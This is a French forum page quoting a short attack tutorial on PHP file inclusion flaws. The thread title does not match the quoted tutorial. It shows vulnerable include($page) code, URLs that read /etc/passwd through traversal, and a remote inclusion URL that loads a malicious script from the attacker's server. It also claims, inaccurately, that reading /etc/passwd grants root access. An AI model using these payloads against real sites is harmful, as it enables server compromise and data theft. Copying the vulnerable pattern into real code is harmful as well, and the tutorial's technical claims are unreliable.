Connexion
S'inscrire
Actualités
Quoi de neuf
Activités générales
Auteurs
Forums
Nouveaux messages
Rechercher un forum
Quoi de neuf
Nouveaux messages
Nouveaux messages de profil
Activités générales
Membres
Membres inscrits
Visiteurs actuels
Nouveaux messages de profil
Rechercher dans les messages des profils
Teams
Créé ton équipe
Quoi de neuf ?
Nouveaux messages
Rechercher un forum
Menu
Connexion
S'inscrire
Install the app
Install
Forums
Forums généraux
Informatique
Développement
Créer un espace membre en PHP #1 - Base de données
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
Vous utilisez un navigateur non à jour ou ancien. Il ne peut pas afficher ce site ou d'autres sites correctement.
Vous devez le mettre à jour ou utiliser un
navigateur alternatif
.
Répondre à la discussion
Message
<blockquote data-quote="AMO ♥ Docteur House" data-source="post: 3954637" data-attributes="member: 79775"><p><strong> <ol> <li data-xf-list-type="ol">1.1 Présentation :<br /> <br /> Le Langage PHP est le langage le plus répandu sur le net mais aussi le plus puissant car il prend controle de la quasi-totalité du serveur.L'include() est l’une des fonctions php les plus utilisées sur la toile , elle permet l’appel de pages depuis une autre . Exemple : Admettons que toutes vos pages utilisent la page sql.php dans laquelle sont contenus vos informations SQL, il convient de l’inclure dans chacune de vos pages plutôt que de retaper l’équivalent de sql.php dans toutes vos pages. Voici donc un exemple pour mieux eclaircir : L’url du site : <a href="http://www.site.com/index.php?page=contact.php" target="_blank">http://www.site.com/index.php?page=contact.php</a> La page index.php ici aurait la structure suivante :<br /> <br /> <?<br /> include("sql.php");<br /> include($page);<br /> include("footer.php");<br /> ?><br /> <br /> Ainsi toutes les pages appelées par index.php de l’url (comme l’exemple ci-dessus ) incluraient automatiquement le fichier sql.php<br /> 1.2 Exploitation :<br /> <br /> Il y a deux manières d’exploiter la faille Include :<br /> Exploitation Interne :<br /> <br /> Reprenons notre Exemple : <a href="http://www.site.com/index.php?page=contact.php" target="_blank">http://www.site.com/index.php?page=contact.php</a>. Ici la page index.php recevait comme paramètre la page contact.php pour ensuite l’inclure, donc si on remplace contact.php par un fichier sensible existant sur le serveur, index.php l’inclurait, ce qui nous permettrait de le lire. Voici quelques exemples :<br /> <br /> <a href="http://www.site.com/index.php?page=/etc/passwd" target="_blank">http://www.site.com/index.php?page=/etc/passwd</a><br /> <a href="http://www.site.com/index.php?page=../../../../../../../etc/passwd" target="_blank">http://www.site.com/index.php?page=../../../../../../../etc/passwd</a><br /> <br /> Ici le site afficherais le contenu du repertoire /etc/passwd ,ou se trouvent les comptes administrateurs,ce qui vous permettrais d’avoir un accès root sur le serveur.<br /> Exploitation Externe :<br /> <br /> Reprenons encore une fois notre Exemple : <a href="http://www.site.com/index.php?page=contact.php" target="_blank">http://www.site.com/index.php?page=contact.php</a>. Ce genre d’exploitation est la plus courante, ici c’est un script php hebergé sur notre propre serveur qu’on pourrait inclure a l’aide d’un appel extérieur de la sorte :< br /> <a href="http://www.site.com/index.php?page=http://www.votreserveur.com/script-malfaisant.php" target="_blank">http://www.site.com/index.php?page=http://www.votreserveur.com/script-malfaisant.php</a> Comme vous l’avez surement compris votre « script-malfaisant » s’occupera du reste, il y a plusieurs possibilités, des connaissances en php s’imposent, ce qui n’est pas l’objet de notre tutoriel.<br /> 1.3 Conclusion :<br /> <br /> La Faille Include est une faille très répandue sur le net, ce qui fait d’elle une faille dangereuse pour les webmasters, qui vise l’index de leur site et aussi leur statut « root ».</li> </ol><p>Source : Hack-Modz</strong></p></blockquote><p></p>
[QUOTE="AMO ♥ Docteur House, post: 3954637, member: 79775"] [B][LIST=1] [*]1.1 Présentation : Le Langage PHP est le langage le plus répandu sur le net mais aussi le plus puissant car il prend controle de la quasi-totalité du serveur.L'include() est l’une des fonctions php les plus utilisées sur la toile , elle permet l’appel de pages depuis une autre . Exemple : Admettons que toutes vos pages utilisent la page sql.php dans laquelle sont contenus vos informations SQL, il convient de l’inclure dans chacune de vos pages plutôt que de retaper l’équivalent de sql.php dans toutes vos pages. Voici donc un exemple pour mieux eclaircir : L’url du site : [URL]http://www.site.com/index.php?page=contact.php[/URL] La page index.php ici aurait la structure suivante : <? include("sql.php"); include($page); include("footer.php"); ?> Ainsi toutes les pages appelées par index.php de l’url (comme l’exemple ci-dessus ) incluraient automatiquement le fichier sql.php 1.2 Exploitation : Il y a deux manières d’exploiter la faille Include : Exploitation Interne : Reprenons notre Exemple : [URL]http://www.site.com/index.php?page=contact.php[/URL]. Ici la page index.php recevait comme paramètre la page contact.php pour ensuite l’inclure, donc si on remplace contact.php par un fichier sensible existant sur le serveur, index.php l’inclurait, ce qui nous permettrait de le lire. Voici quelques exemples : [URL]http://www.site.com/index.php?page=/etc/passwd[/URL] [URL]http://www.site.com/index.php?page=../../../../../../../etc/passwd[/URL] Ici le site afficherais le contenu du repertoire /etc/passwd ,ou se trouvent les comptes administrateurs,ce qui vous permettrais d’avoir un accès root sur le serveur. Exploitation Externe : Reprenons encore une fois notre Exemple : [URL]http://www.site.com/index.php?page=contact.php[/URL]. Ce genre d’exploitation est la plus courante, ici c’est un script php hebergé sur notre propre serveur qu’on pourrait inclure a l’aide d’un appel extérieur de la sorte :< br /> [URL]http://www.site.com/index.php?page=http://www.votreserveur.com/script-malfaisant.php[/URL] Comme vous l’avez surement compris votre « script-malfaisant » s’occupera du reste, il y a plusieurs possibilités, des connaissances en php s’imposent, ce qui n’est pas l’objet de notre tutoriel. 1.3 Conclusion : La Faille Include est une faille très répandue sur le net, ce qui fait d’elle une faille dangereuse pour les webmasters, qui vise l’index de leur site et aussi leur statut « root ». [/LIST] Source : Hack-Modz[/B] [/QUOTE]
Insérer les citations…
Vérification
Publier la réponse
Forums
Forums généraux
Informatique
Développement
Créer un espace membre en PHP #1 - Base de données
Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
Acceptez
En savoir plus.…
Haut